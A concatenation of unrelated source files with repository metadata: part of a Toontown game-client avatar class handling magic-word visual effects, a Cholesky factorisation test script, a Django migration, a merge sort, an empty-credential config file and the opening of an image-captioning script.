messenger.send(self.uniqueName('magicWordChange'), [0, flag])
def getUnlimitedGags(self):
return self.unlimitedGags
def setInstaKill(self, flag):
self.instaKill = flag
messenger.send(self.uniqueName('magicWordChange'), [2, flag])
def getInstaKill(self):
return self.instaKill
def setRun(self):
if self.isLocal():
inputState.set('debugRunning', inputState.isSet('debugRunning') is not True)
def generateRainbow(self):
intervalName = 'RainbowSeq'
if self.activeIntervals.has_key(intervalName):
self.destroyRainbow()
return
red = (1.0, 0.0, 0.0, 1.0)
orange = (0.898, 0.42, 0.024, 1.0)
yellow = (0.945, 0.957, 0.259, 1.0)
green = (0.0, 1.0, 0.0, 1.0)
blue = (0.0, 0.0, 1.0, 1.0)
indigo = (0.247, 0.0, 1.0, 1.0)
violet = (0.498, 0.0, 1.0, 1.0)
rainbowSeq = Parallel()
for node in (render, render2d, aspect2d):
rainbowSeq.append(Sequence(LerpColorScaleInterval(node, 0.5, red), LerpColorScaleInterval(node, 0.5, orange), LerpColorScaleInterval(node, 0.5, yellow), LerpColorScaleInterval(node, 0.5, green), LerpColorScaleInterval(node, 0.5, blue), LerpColorScaleInterval(node, 0.5, indigo), LerpColorScaleInterval(node, 0.5, violet)))
rainbowSeq.loop()
intervalName = 'RainbowSeq'
self.storeInterval(rainbowSeq, intervalName)
def destroyRainbow(self):
intervalName = 'RainbowSeq'
self.clearInterval(intervalName)
for node in (render, render2d, aspect2d):
node.clearColorScale()
def generateFanfare(self):
from toontown.battle import Fanfare
fanfare = Sequence(Fanfare.makeFanfare(0, self)[0])
fanfare.start()
def generateTrolley(self, timestamp):
station = loader.loadModel('phase_4/models/modules/trolley_station_TT')
trolley = station.find('**/trolley_car')
trolley.setZ(100)
trolley.reparentTo(self)
station.removeNode()
dropSfx = loader.loadSfx('phase_5/audio/sfx/cogbldg_drop.ogg')
landSfx = loader.loadSfx('phase_5/audio/sfx/AA_drop_boat_cog.ogg')
trolleySfx = loader.loadSfx('phase_4/audio/sfx/MG_sfx_travel_game_bell_for_trolley.ogg')
fadeSfx = loader.loadSfx('phase_4/audio/sfx/SZ_trolley_bell.ogg')
        magicTrolleySeq = Sequence(
            Func(base.playSfx, dropSfx),
            Parallel(trolley.scaleInterval(7, (1, 1, 1)), trolley.posInterval(7, (0, 0, 0))),
            Func(self.setAnimState, 'Squish'),
            Func(base.playSfx, landSfx),
            Func(base.playSfx, trolleySfx, 0, 1, 1.5),
            trolley.posInterval(0.1, (0, 0, 0.5)),
            trolley.posInterval(0.1, (0, 0, 0)),
            Wait(0.4),
            Func(base.playSfx, fadeSfx, 0, 1, 1.5),
            trolley.scaleInterval(1, (0, 0, 0)),
            Func(trolley.removeNode),
            Wait(1.3),
            Func(self.setAnimState, 'neutral'))
ts = globalClockDelta.localElapsedTime(timestamp)
magicTrolleySeq.start(ts)
def generateBrowserEasterEgg(self, index):
if not index:
webbrowser.open('https://www.infowars.com/')
elif index == 1:
webbrowser.open('https://www.msnbc.com/')
webbrowser.open('https://www.cnn.com/')
def generateGreenEffect(self, character='f', toonId=0):
intervalName = 'GreenSeq'
cogTypes = [
TTLocalizer.SellbotP.lower(), TTLocalizer.CashbotP.lower(), TTLocalizer.LawbotP.lower(), TTLocalizer.BossbotP.lower()]
if character in cogTypes:
cogFlyInPos = ToontownGlobals.GreenEffectMassFlyPositions
cogList = ToontownGlobals.GreenEffectMassFlyCogs
seq = Parallel()
for x in range(len(cogFlyInPos)):
cog = ToontownAvatarUtils.createCog(cogList[cogTypes.index(character)][x], self.getX() + cogFlyInPos[x][0], self.getY() + cogFlyInPos[x][1], self.getZ(), 0, 0, 0, parent=hidden)
cogFlyIn = cog.beginSupaFlyMove(VBase3(self.getX() + cogFlyInPos[x][0], self.getY() + cogFlyInPos[x][1], self.getZ()), 1, 'flyIn')
cogSeq = Sequence(Func(cog.addActive), Func(cog.headsUp, self), Func(cog.reparentTo, render), cogFlyIn, Func(cog.setChatAbsolute, TTLocalizer.GreenEffectPhase, CFSpeech | CFTimeout), ActorInterval(cog, 'victory'), Func(cog.loop, 'neutral'), Wait(1), Func(self.cleanupGreenEffect, cog))
seq.append(cogSeq)
seq.start()
self.storeInterval(seq, intervalName)
return
if toonId == 2:
if self.isDisguised:
if self.isCog not in ToontownGlobals.PutOnSuitToonHead:
cog = ToontownAvatarUtils.createCog(self.suit.style.name, 0, 8, self.getZ(self), self.getH(), 0, 0, parent=self, isSkelecog=self.suit.isSkeleton, isWaiter=self.suit.isWaiter, isVirtual=self.suit.isVirtual, isSkeleRevive=self.suit.isSkeleRevive, colorType=self.nametag.getColorCode(), level=self.cogLevels[SuitDNA.suitDepts.index(SuitDNA.getSuitDept(self.suit.style.name))] + 1)
cog.wrtReparentTo(hidden)
cogFlyIn = cog.beginSupaFlyMove(VBase3(cog.getX(), cog.getY(), cog.getZ()), 1, 'flyIn')
seq = Sequence(Func(cog.addActive), Func(cog.headsUp, self), Func(cog.reparentTo, render), cogFlyIn, Func(cog.setChatAbsolute, TTLocalizer.GreenEffectPhase, CFSpeech | CFTimeout), ActorInterval(cog, 'victory'), Func(cog.loop, 'neutral'), Wait(1), Func(self.cleanupGreenEffect, cog))
seq.start()
self.storeInterval(seq, intervalName)
return
else:
toon = ToontownAvatarUtils.createUniqueToon(self.getName(), self.style.asTuple(), self.hat, self.glasses, self.backpack, self.shoes, 0, 8, self.getZ(self), self.getH(), parent=self, isDisguised=True, suitType=self.suit.style.name, suitDept=self.suit.style.dept, isWaiter=self.suit.isWaiter, isRental=self.suit.isRental, colorType=self.nametag.getColorCode(), cogLevels=self.getCogLevels(), cheesyEffect=self.cheesyEffect)
toon.wrtReparentTo(hidden)
cogFlyIn = toon.getSuitTeleport(moveIn=1, startPos=(toon.getX(), toon.getY(), toon.getZ()))
seq = Sequence(Func(toon.addActive), Func(toon.headsUp, self), Func(toon.reparentTo, render), cogFlyIn, Func(toon.setChatAbsolute, TTLocalizer.GreenEffectPhase, CFSpeech | CFTimeout), ActorInterval(toon.suit, 'victory'), Func(toon.suit.loop, 'neutral'), Wait(1), Func(self.cleanupGreenEffect, toon, 1))
seq.start()
self.storeInterval(seq, intervalName)
return
else:
toon = ToontownAvatarUtils.createUniqueToon(self.getName(), self.style.asTuple(), self.hat, self.glasses, self.backpack, self.shoes, 0, 5, self.getZ(self), self.getH(), 0, 0, parent=self, colorType=self.nametag.getColorCode(), cheesyEffect=self.cheesyEffect, nametagStyle=self.nametagStyle)
toon.wrtReparentTo(hidden)
if toon.style.getAnimal() == 'bear':
angryToonSFX = loader.loadSfx('phase_3.5/audio/dial/AV_bear_exclaim.ogg')
else:
angryToonSFX = loader.loadSfx('phase_3.5/audio/sfx/avatar_emotion_angry.ogg')
toonTeleportIn = Sequence(Func(toon.animFSM.request, 'TeleportIn'), Wait(1.517), Func(toon.animFSM.request, 'neutral'))
seq = Sequence(Parallel(Func(toon.reparentTo, render), Func(toon.addActive)), Func(toon.headsUp, self), toonTeleportIn, Func(toon.setChatAbsolute, OTPLocalizer.SpeedChatStaticTextToontown.get(905), CFSpeech | CFTimeout), Parallel(SoundInterval(angryToonSFX, loop=1, node=toon), Sequence(Func(toon.angryEyes), Func(toon.blinkEyes), ActorInterval(toon, 'angry'), Func(toon.normalEyes), Func(toon.blinkEyes), Func(toon.loop, 'neutral')), Wait(3)), Func(toon.setChatAbsolute, TTLocalizer.GreenEffectPhase, CFSpeech | CFTimeout), ActorInterval(toon, 'hypnotize'), Func(self.cleanupGreenEffect, toon, 1))
seq.start()
self.storeInterval(seq, intervalName)
return
else:
if toonId != 0:
toon = ToontownAvatarUtils.createToon(toonId, 0, 5, self.getZ(self), self.getH(), 0, 0, parent=self)
toon.wrtReparentTo(hidden)
if toon.style.getAnimal() == 'bear':
angryToonSFX = loader.loadSfx('phase_3.5/audio/dial/AV_bear_exclaim.ogg')
else:
angryToonSFX = loader.loadSfx('phase_3.5/audio/sfx/avatar_emotion_angry.ogg')
toonTeleportIn = Sequence(Func(toon.animFSM.request, 'TeleportIn'), Wait(1.517), Func(toon.animFSM.request, 'neutral'))
seq = Sequence(Parallel(Func(toon.reparentTo, render), Func(toon.addActive)), Func(toon.headsUp, self), toonTeleportIn, Func(toon.setChatAbsolute, OTPLocalizer.SpeedChatStaticTextToontown.get(905), CFSpeech | CFTimeout), Parallel(SoundInterval(angryToonSFX, loop=1, node=toon), Sequence(Func(toon.angryEyes), Func(toon.blinkEyes), ActorInterval(toon, 'angry'), Func(toon.normalEyes), Func(toon.blinkEyes), Func(toon.loop, 'neutral')), Wait(3)), Func(toon.setChatAbsolute, TTLocalizer.GreenEffectPhase, CFSpeech | CFTimeout), ActorInterval(toon, 'hypnotize'), Func(self.cleanupGreenEffect, toon, 1))
seq.start()
self.storeInterval(seq, intervalName)
return
else:
if character == 'panda':
panda = Actor.Actor('phase_3/models/char/panda', {'walk': 'phase_3/models/char/panda-walk'})
panda.setBlend(frameBlend=base.settings.getBool('game', 'smooth-animations', False))
panda.setTransparency(1)
panda.setPosHpr(self.getX(), self.getY(), self.getZ(), self.getH() - 180, 0, 0)
panda.setScale(0.5)
walkNode = NodePath('Panda3DWalkNode')
walkNode.setPosHpr(self.getX(), self.getY(), self.getZ(), self.getH() - 180, 0, 0)
seq = Sequence(Func(panda.reparentTo, render), Func(panda.loop, 'walk'), Parallel(LerpColorScaleInterval(panda, 1.0, colorScale=VBase4(1, 1, 1, 1), startColorScale=VBase4(1, 1, 1, 0)), LerpPosInterval(panda, 5.0, (0,
-25,
0), other=walkNode), Sequence(Wait(4), LerpScaleInterval(panda, 1.0, 0))), Func(self.cleanupGreenEffect, panda, 2, walkNode))
seq.start()
self.storeInterval(seq, intervalName)
return
cog = ToontownAvatarUtils.createCog(character, 0, 8, self.getZ(self), self.getH(), 0, 0, parent=self)
cog.wrtReparentTo(hidden)
cogFlyIn = cog.beginSupaFlyMove(VBase3(cog.getX(), cog.getY(), cog.getZ()), 1, 'flyIn')
seq = Sequence(Func(cog.addActive), Func(cog.headsUp, self), Func(cog.reparentTo, render), cogFlyIn, Func(cog.setChatAbsolute, TTLocalizer.GreenEffectPhase, CFSpeech | CFTimeout), ActorInterval(cog, 'victory'), Func(cog.loop, 'neutral'), Wait(1), Func(self.cleanupGreenEffect, cog))
seq.start()
self.storeInterval(seq, intervalName)
return
def cleanupGreenEffect(self, character, type=0, node=None):
if character:
if type == 1:
if character.isDisguised:
if self.isCog != 0 and self.isCog != 5 and self.isCog != 9:
cogFlyOut = character.beginSupaFlyMove(VBase3(character.getX(), character.getY(), character.getZ()), 0, 'flyOut')
seq = Sequence(cogFlyOut, Func(character.reparentTo, hidden), Func(character.cleanup), Func(character.removeActive), Func(character.removeNode))
else:
cogFlyOut = character.getSuitTeleport(moveIn=0)
seq = Sequence(cogFlyOut, Func(character.reparentTo, hidden), Func(character.cleanup), Func(character.removeActive), Func(character.removeNode))
else:
seq = Sequence(Func(character.animFSM.request, 'TeleportOut'), Wait(character.getDuration('teleport') + 1.0), Func(character.reparentTo, hidden), Func(character.stopBlink), Func(character.cleanup), Func(character.removeActive), Func(character.removeNode))
elif type == 2:
seq = Sequence(Func(character.reparentTo, hidden), Func(character.cleanup), Func(character.removeNode), Func(node.removeNode))
else:
cogFlyOut = character.beginSupaFlyMove(VBase3(character.getX(), character.getY(), character.getZ()), 0, 'flyOut')
seq = Sequence(cogFlyOut, Func(character.reparentTo, hidden), Func(character.cleanup), Func(character.removeActive), Func(character.removeNode))
seq.start()
def cleanupGreenEffectIntervals(self):
intervalName = 'GreenSeq'
for key in self.activeIntervals.keys():
if intervalName in key:
self.clearInterval(key)
def generateSnapEffect(self):
from toontown.battle import BattleParticles
from toontown.battle import MovieSuitAttacks
        headEffect = BattleParticles.createParticleEffect('RubOut', color=(0, 0, 0, 1))
        torsoEffect = BattleParticles.createParticleEffect('RubOut', color=(0, 0, 0, 1))
        legsEffect = BattleParticles.createParticleEffect('RubOut', color=(0, 0, 0, 1))
animal = self.style.getAnimal()
bodyScale = ToontownGlobals.toonBodyScales[animal]
def toonFacePoint(toon, zOffset=0, parent=render):
pnt = toon.getPos(parent)
pnt.setZ(pnt[2] + toon.shoulderHeight + 0.3 + zOffset)
return Point3(pnt)
headEffectHeight = toonFacePoint(self).getZ()
legsHeight = ToontownGlobals.legHeightDict[self.style.legs] * bodyScale
torsoEffectHeight = ToontownGlobals.torsoHeightDict[self.style.torso] * bodyScale / 2 + legsHeight
legsEffectHeight = legsHeight / 2
effectX = headEffect.getX()
effectY = headEffect.getY()
headEffect.setPos(effectX, effectY - 1.5, headEffectHeight)
torsoEffect.setPos(effectX, effectY - 1, torsoEffectHeight)
legsEffect.setPos(effectX, effectY - 0.6, legsEffectHeight)
headParts = self.getHeadParts()
torsoParts = self.getTorsoParts()
legsParts = self.getLegsParts()
headTrack = MovieSuitAttacks.getPartTrack(headEffect, 0, 2.0, [headEffect, self, 0])
torsoTrack = MovieSuitAttacks.getPartTrack(torsoEffect, 0, 2.0, [torsoEffect, self, 0])
legsTrack = MovieSuitAttacks.getPartTrack(legsEffect, 0, 2.0, [legsEffect, self, 0])
def hideParts(parts):
track = Parallel()
for partNum in xrange(0, parts.getNumPaths()):
nextPart = parts.getPath(partNum)
track.append(Func(nextPart.setTransparency, 1))
track.append(LerpFunctionInterval(nextPart.setAlphaScale, fromData=1, toData=0, duration=2.0))
return track
def showParts(parts):
track = Sequence()
for partNum in xrange(0, parts.getNumPaths()):
nextPart = parts.getPath(partNum)
track.append(LerpFunctionInterval(nextPart.setAlphaScale, fromData=0, toData=1, duration=2.0))
track.append(Func(nextPart.clearTransparency))
return track
snap = Sequence(Wait(2.5), Parallel(hideParts(headParts), hideParts(torsoParts), hideParts(legsParts), headTrack, torsoTrack, legsTrack), Wait(2), Parallel(showParts(headParts), showParts(torsoParts), showParts(legsParts)))
snap.start()
def generateOboeEffect(self):
oboe = base.loader.loadSfx('phase_14.5/audio/sfx/oboe.ogg')
base.playSfx(oboe, node=self)
def generateCage(self, doAnim=True):
if self.getLocked():
self.cage = loader.loadModel('phase_14/models/props/outpost_cage')
self.cage.setScale(0.01)
self.cageCameraNode = self.attachNewNode(self.uniqueName('cageCameraNode'))
self.cageCameraNode.setZ(100)
self.cageCameraNode.wrtReparentTo(render)
self.cage.reparentTo(self.cageCameraNode)
if self.isLocal():
base.localAvatar.stopUpdateSmartCamera()
base.camera.reparentTo(self.cageCameraNode)
base.camera.setPosHpr(7.5, 15, 4, 150, 0, 0)
else:
collisions = self.cage.findAllMatches('**/+CollisionNode')
if collisions:
for coll in collisions:
coll.stash()
if doAnim:
dropSfx = loader.loadSfx('phase_5/audio/sfx/cogbldg_drop.ogg')
dropSfx.setPlayRate(2)
landSfx = loader.loadSfx('phase_5/audio/sfx/AA_drop_bigweight.ogg')
cageSeq = Sequence(Func(self.setAnimState, 'neutral'), Func(base.playSfx, dropSfx), Parallel(self.cage.scaleInterval(3.5, (0.2,
0.2,
0.2)), self.cageCameraNode.posInterval(3.5, (self.getX(), self.getY(), self.getZ()))), Func(self.setZ, self.getZ() + 1), Func(base.playSfx, landSfx))
else:
self.cage.setScale(0.2, 0.2, 0.2)
self.cageCameraNode.reparentTo(self)
self.cageCameraNode.setZ(-1)
cageSeq = None
else:
if self.isLocal():
base.camera.reparentTo(base.localAvatar)
base.localAvatar.startUpdateSmartCamera()
if not self.cageCameraNode:
return
kapow = globalPropPool.getProp('kapow')
kapow.setBillboardPointWorld(2)
kapow.setScale(0.75)
kapow.setZ(2)
kapow.reparentTo(self.cageCameraNode)
boomSfx = loader.loadSfx('phase_3.5/audio/sfx/ENC_cogfall_apart.ogg')
cageSeq = Parallel(Parallel(SoundInterval(boomSfx, node=kapow, volume=1), ActorInterval(kapow, 'kapow')), Sequence(Wait(0.75), Func(kapow.removeNode), Func(self.cageCameraNode.removeNode)))
if cageSeq:
cageSeq.start()
self.storeInterval(cageSeq, 'cageSeq')
return
def setLocked(self, locked):
self.locked = locked
if not self.isLocal():
if locked and not self.isGenerated():
self.generateCage(False)
return
if self.isGenerated():
if locked:
self.disableAvatarControls()
self.collisionsOff()
self.disableSleeping()
self.obscureFriendsListButton(1)
self.hideClarabelleGui()
self.laffMeter.hide()
self.book.hideButton()
self.ignoreOnscreenHooks()
base.localAvatar.setTeleportAvailable(0)
base.localAvatar.setTeleportAllowed(0)
base.cr.playGame.getPlace().walkStateData.toggleBook('disable')
if base.cr.propGenerator:
base.cr.propGenerator.disableHotkey()
else:
self.collisionsOn()
self.enableAvatarControls()
self.enableSleeping()
self.obscureFriendsListButton(-1)
self.refreshOnscreenButtons()
self.laffMeter.show()
self.book.showButton()
self.acceptOnscreenHooks()
base.localAvatar.setTeleportAvailable(1)
base.localAvatar.setTeleportAllowed(1)
base.cr.playGame.getPlace().walkStateData.toggleBook('enable')
if base.cr.propGenerator:
base.cr.propGenerator.enableHotkey()
def getLocked(self):
return self.locked
def setMuted(self, muted, timed):
self.muted = muted
if muted:
if timed:
if timed > 1:
message = TTLocalizer.MutedTimedPlural % timed
else:
message = TTLocalizer.MutedTimedSingular % timed
else:
message = TTLocalizer.MutedTrue
else:
message = TTLocalizer.MutedFalse
self.setSystemMessage(0, message, WhisperPopup.WTEmote)
def getMuted(self):
return self.muted
def setTransitioning(self, transitioning):
self.transitioning = transitioning
def getTransitioning(self):
return self.transitioning
def playSound(self, sound, loop=0):
soundWithExt = sound + '.ogg'
bgmPhases = [3, 3.5, 4, 5.5, 6, 7, 8, 9, 10, 11, 12, 13, 14.5]
dialPhases = [3, 3.5, 4, 5.5, 6, 8]
sfxPhases = [3, 3.5, 4, 5, 5.5, 6, 8, 9, 10, 11, 12, 13, 14.5]
bgmSearchPath = DSearchPath()
for phase in bgmPhases:
bgmSearchPath.appendDirectory('/phase_' + str(phase) + '/audio/bgm')
dialSearchPath = DSearchPath()
for phase in dialPhases:
dialSearchPath.appendDirectory('/phase_' + str(phase) + '/audio/dial')
sfxSearchPath = DSearchPath()
for phase in sfxPhases:
sfxSearchPath.appendDirectory('/phase_' + str(phase) + '/audio/sfx')
filename = Filename(soundWithExt)
found = vfs.resolveFilename(filename, bgmSearchPath)
if found:
music = base.loader.loadMusic(filename.getFullpath())
base.playMusic(music, looping=loop, volume=0.8)
if not music.getLoop():
taskMgr.doMethodLater(music.length() + 1, self.playZoneMusic, self.taskName('play-zone-music'))
else:
found = vfs.resolveFilename(filename, dialSearchPath)
if not found:
found = vfs.resolveFilename(filename, sfxSearchPath)
if not found:
self.notify.warning('%s not found on:' % soundWithExt)
print bgmSearchPath
print dialSearchPath
print sfxSearchPath
else:
sfx = base.loader.loadSfx(filename.getFullpath())
base.playSfx(sfx, looping=loop, volume=0.8)
def playZoneMusic(self, task):
place = base.cr.playGame.getPlace()
if place:
base.playMusic(place.loader.music, looping=1, volume=0.8)
return task.done
def doTeleport(self, hood):
place = base.cr.playGame.getPlace()
if place:
place.doTeleport(hood)
def setToonScale(self, scale):
previousScale = self.toonScale
self.toonScale = scale
scaleTime = abs(previousScale - scale) / 2
scaleSeq = self._Toon__doToonScale(scale, scaleTime)
if self.isLocal():
scaleSeq.append(Sequence(Func(self.initCameraPositions), Func(self.resetCameraPosition)))
scaleSeq.start()
def getToonScale(self):
return self.toonScale
def setCarActive(self, carActive):
self.carActive = carActive
if self.isGenerated():
self.updateCarActive()
def getCarActive(self):
return self.carActive
def canRaceHere(self):
if self.getHp() <= 10:
return False
place = base.cr.playGame.place
if not place:
return False
from toontown.safezone.Playground import Playground
from toontown.town.Street import Street
from toontown.coghq.CogHQExterior import CogHQExterior
from toontown.coghq.FactoryExterior import FactoryExterior
from toontown.coghq.LawbotOfficeExterior import LawbotOfficeExterior
return isinstance(place, Playground) or isinstance(place, CogHQExterior) or isinstance(place, Street) or isinstance(place, FactoryExterior) or isinstance(place, LawbotOfficeExterior)
def updateCarActive(self):
if self.carActive:
if not self.carInterest and self.canRaceHere():
self.getDustCloud(0.0, scale=0.8).start()
self.carInterest = base.cr.addInterest(self.doId, [100], 'kart-%d' % self.doId)
else:
if self.carInterest:
if self.isGenerated():
self.getDustCloud(0.0, scale=0.8).start()
base.cr.removeInterest(self.carInterest)
self.carInterest = None
return
def setLoop(self, anim, start, end, part):
start = start if start != -1 else None
end = end if end != -1 else None
part = part if part else None
if self.getIsTransformed():
geom = self.getActiveTransformation()
geom.loop(anim, fromFrame=start, toFrame=end, partName=part)
else:
self.loop(anim, fromFrame=start, toFrame=end, partName=part)
return
def setPingPong(self, anim, start, end, part):
start = start if start != -1 else None
end = end if end != -1 else None
part = part if part else None
if self.getIsTransformed():
geom = self.getActiveTransformation()
geom.pingpong(anim, fromFrame=start, toFrame=end, partName=part)
else:
self.pingpong(anim, fromFrame=start, toFrame=end, partName=part)
return
def setPose(self, anim, frame, part):
part = part if part else None
if self.getIsTransformed():
geom = self.getActiveTransformation()
geom.pose(anim, frame, part)
else:
self.pose(anim, frame, part)
return
def storeInterval(self, interval, name):
if name in self.activeIntervals:
name = name + str(len(self.activeIntervals.keys()))
self.activeIntervals[name] = interval
def cleanupIntervals(self):
for interval in self.activeIntervals.values():
interval.finish()
DelayDelete.cleanupDelayDeletes(interval)
self.activeIntervals = {}
def clearInterval(self, name, finish=1):
if self.activeIntervals.has_key(name):
ival = self.activeIntervals[name]
if finish:
ival.finish()
else:
ival.pause()
if self.activeIntervals.has_key(name):
DelayDelete.cleanupDelayDeletes(ival)
del self.activeIntervals[name]
else:
self.notify.debug('interval: %s already cleared' % name)
def finishInterval(self, name):
if self.activeIntervals.has_key(name):
interval = self.activeIntervals[name]
interval.finish()
def isPlayerControlled(self):
return True
def setUnlocks(self, unlocks):
self.unlocks = unlocks
def getUnlocks(self):
return self.unlocks
|
[
"[email protected]"
] | |
eac46b0f2d21a6532ee402e63d5d7d49626ae549
|
6f86dc36bd4bcf53fb4dfe7208db5c7220dce0bc
|
/test_cholesky.py
|
474aa34840863ce930a7f8e1e601ebaddadc4338
|
[] |
no_license
|
ElfenStomp/Projet2_algonum
|
5950b3fb89bf83e5f13bf43e48140d709ea49b1b
|
19aff4bdefa7f571956df45dac9555cf068793a5
|
refs/heads/master
| 2021-01-22T07:23:26.210564 | 2017-03-11T12:44:34 | 2017-03-11T12:44:34 | 81,814,660 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,976 |
py
|
import numpy as np
import time
import matplotlib.pyplot as plt
from matplotlib.legend_handler import HandlerLine2D
import sdp_matrix as sdp
import cholesky as cho
##Test incomplete cholesky and cholesky
def test_cholesky_incomplet():
n = 100
nb_extra_diag = ((n**2) // 2) - n - 1
t1 = np.arange(0, nb_extra_diag, 50)
t2=[]
t3=[]
l=len(t1)
for i in range(0, nb_extra_diag, 50):
A=sdp.matrice_SDP(n, i)
tmps=time.time()
cho.cholesky(A)
t2.append(time.time()-tmps)
tmps=time.time()
cho.cholesky_incomplet(A)
t3.append(time.time()-tmps)
plt.figure(1)
plt.subplot(211)
    line1, = plt.plot(t1, t2, color="blue", label="Cholesky")
    line2, = plt.plot(t1, t3, color="red", label="Incomplete Cholesky")
    plt.legend(handler_map={line1: HandlerLine2D(numpoints=4)})
    plt.xlabel("Number of extra-diagonal terms")
    plt.ylabel("Execution time (seconds)")
plt.show()
##PART_1
#1.Cholesky
A=np.array([[1, 1, 1, 1], [1, 5, 5, 5], [1, 5, 14, 14], [1, 5, 14, 15]])
print("Matrice A :")
cho.display(A)
print("Cholesky(A) :")
cho.display(cho.cholesky(A))
"""Complexite: (n**3)/6 additions et multiplications, (n*(n-1))/2 divisions, n evaluations de racines carrees. Donc la complexite est en teta(1/3 *n**3)."""
#2.
"""
1. L'algorithme de Cholesky à une compléxité en O(n**3).
2. A * x = b
-> L * L_t * x = b n**3 (Cholesky)
-> L * y = b n**2 (Pivot descendant)
-> L_t * x = y n**2 (Pivot montant)
Au final la complexite est de l'ordre de O(n**3)
"""
#3. Building an SDP matrix
"""Takes as input the desired matrix size and the number of extra-diagonal terms (< n**2/2)"""
print("Matrice SDP de taille 5 avec 3 termes extra-diagonaux non nuls :")
cho.display(sdp.matrice_SDP(5, 3))
#4. Incomplete Cholesky
test_cholesky_incomplet()
#TODO: compute the complexity
#5.
cho.preconditionneur(A)
|
[
"[email protected]"
] | |
19ee46eafd56767062c10f852b133d62639531f8
|
ac3339c95afe9066d66ff009fb1b7c3fde927ee6
|
/Python/06_Django/02_Django/07_UserDashboard/apps/app_main/migrations/0002_auto_20170624_1918.py
|
55dd4e0299c385a3e6d10cf49ee03da56d3f5511
|
[] |
no_license
|
aakasht05/DojoAssignments
|
5d5013700528084fd17f93ebaea55d20aeea2d9d
|
227f6deb62e75e07243ec9058d8557973b03840e
|
refs/heads/master
| 2021-05-03T15:46:39.527638 | 2018-04-13T05:59:38 | 2018-04-13T05:59:38 | 120,479,335 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 708 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-24 19:18
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.manager
class Migration(migrations.Migration):
dependencies = [
('app_main', '0001_initial'),
]
operations = [
migrations.AlterModelManagers(
name='user',
managers=[
('UserManager', django.db.models.manager.Manager()),
],
),
migrations.AddField(
model_name='user',
name='description',
field=models.TextField(default=None, max_length=1000),
preserve_default=False,
),
]
|
[
"[email protected]"
] | |
bbbe89c1a80c1289601bc6dae809de7b4cd5e5d6
|
fbacac402e2272e0664eda587cdb085cde0e6a95
|
/Python-Codes/MergeSort.py
|
ceb9c7a3a41f94377eb77024cdf3827ad09ee102
|
[] |
no_license
|
bhandari-nitin/Python-Code
|
e041684777fcbee183d0609856cf2743ed5c7253
|
36b06821c639a79ffc650807d9b03eca4397449e
|
refs/heads/master
| 2020-03-11T17:19:55.274288 | 2018-04-19T02:00:49 | 2018-04-19T02:00:49 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 594 |
py
|
###################
#### Merge Sort####
###################
#Supporting function for merge sort
def merge(a, b):
c = []
while len(a) != 0 and len(b) != 0:
if a[0] < b[0]:
c.append(a[0])
            a.remove(a[0])
else:
c.append(b[0])
            b.remove(b[0])
if len(a) == 0:
c += b
else:
c += a
return c
def mergeSort(arr):
if len(arr) ==0 or len(arr) == 1:
return arr
else:
mid = len(arr)/2
a = mergeSort(arr[:mid])
        b = mergeSort(arr[mid:])
return merge(a, b)
def main():
arr = [45, 23, 1, 44, 77, 0 ,3, 121]
print mergeSort(arr)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
219eae34810f92508e8de57b2ebb97decce009db
|
74f5cf339f3d8233d04d3a0be55231d9105bb983
|
/notifier/config.py
|
2ab3c76b41fbdecf7373a627b9966896ac77a6dc
|
[] |
no_license
|
camvi/sample
|
eac77d9fc8e4d6898894c763917a5195158fb666
|
24a8c0ee53ed87cc20a4e3dc7c11860e91265f27
|
refs/heads/master
| 2020-04-16T12:36:04.430211 | 2019-07-16T20:00:05 | 2019-07-16T20:00:05 | 165,587,135 | 2 | 3 | null | 2019-10-30T23:56:05 | 2019-01-14T03:08:48 |
C++
|
UTF-8
|
Python
| false | false | 399 |
py
|
email_options = {
"from_addr": '',
"from_addr_password": '',
"smtp_server": '',
"smtp_port": 587,
"ssl": False,
"to_addr": "",
"enabled": False
}
twilio_options = {
'sid': '',
'token': '',
'phone': '',
'to_phone': "",
"enabled": False
}
camvi_options = {
"ip": 'localhost',
"port": '8080',
"username": 'admin',
"password": 'admin'
}
|
[
"[email protected]"
] | |
1c97b935612b094e79e1637a5a338585a5833fb8
|
3685ccf0910e7780421a57ca15ca5381510390ea
|
/schema_registry/schema_registry/extensions.py
|
a1795b787268361c9b7348c63bd46a7d77b867fc
|
[] |
no_license
|
winex888/federation_graphql
|
9db3e5d6d75a9433906bb5cff34d7fd043380caa
|
00e296ad36b82083c2e16d4800b59cd6b0e2d66e
|
refs/heads/main
| 2023-08-03T09:37:11.038257 | 2023-07-24T10:28:53 | 2023-07-24T10:28:53 | 360,777,023 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,168 |
py
|
import logging
from schema_registry.api.models import db
from schema_registry.conf import settings
async def init_db(_app) -> None:
"""
Инициализация подключения к бд
"""
logging.info('Подключение к БД... ({db_dsn})'.format(db_dsn=settings.DB_DSN))
await db.set_bind(
settings.DB_DSN,
echo=settings.POSTGRES.echo,
min_size=settings.POSTGRES.pool_min_size,
max_size=settings.POSTGRES.pool_max_size,
ssl=settings.POSTGRES.ssl,
)
try:
await db.scalar('select now()')
        logging.info('Database connection established successfully')
except ConnectionRefusedError as ex:
logging.error(
            'Error connecting to the database ({db_dsn}), error: {errors}'.format(
db_dsn=settings.DB_DSN,
errors=ex.strerror,
),
)
async def close_db(_app) -> None:
"""
Отключение подключения к бд
"""
logging.info('Отключение подключения к базе дынных...')
await db.pop_bind().close()
|
[
"[email protected]"
] | |
a016251f6e85bb504ee575a1832918e4b6055986
|
a22cd41cfaa1deb1a56149e613ef84d5f6507dbc
|
/Code/main.py
|
c911327676e1df83b26d6838a781e9d95a497cd5
|
[] |
no_license
|
arpanghoshal/ImageCaptionGenerator
|
df5442d65ae2eba1583f7d52a9a0d8b5f9836166
|
4a03e51f4ab14cb780180ffd8df635ddf3bb6cff
|
refs/heads/master
| 2022-04-24T07:53:46.340135 | 2020-04-26T17:08:06 | 2020-04-26T17:08:06 | 258,891,494 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,402 |
py
|
#%%
import os
import tensorflow as tf
import cv2
import numpy as np
import os
from matplotlib import pyplot as plt
import random
import pandas as pd
from scipy.sparse import csr_matrix
from scipy.sparse import vstack
import re
#%%
tf.device("/device:GPU:0")
